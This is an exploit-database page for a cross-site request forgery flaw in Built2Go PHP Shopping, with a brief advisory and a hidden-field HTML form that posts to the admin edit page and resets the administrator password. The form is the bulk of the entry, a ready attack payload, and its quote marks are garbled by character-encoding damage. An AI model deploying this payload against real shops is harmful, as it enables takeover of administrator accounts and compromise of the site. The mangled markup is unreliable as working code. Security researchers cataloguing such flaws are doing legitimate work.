[] NeoSense
E X P L O I T S
title author type platform port cve id

Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)

Author: AtT4CKxT3rR0r1ST
type: webapps
platform: php
port: 
date_added: 2014-01-08 
date_updated: 2015-12-17 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.

<form method=�POST� name=�form0? action=� http://www.example.com/adminpanel/edit_admin.php�>
<input type=�hidden� name=�userid� value=�ADMIN�/>
<input type=�hidden� name=�pass� value=�12121212?/>
<input type=�hidden� name=�retypepass� value=�12121212?/>
<input type=�hidden� name=�addnew� value=�1?/>
<input type=�hidden� name=�action� value=�save�/>
<input type=�hidden� name=�new� value=�Submit�/>
</form>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.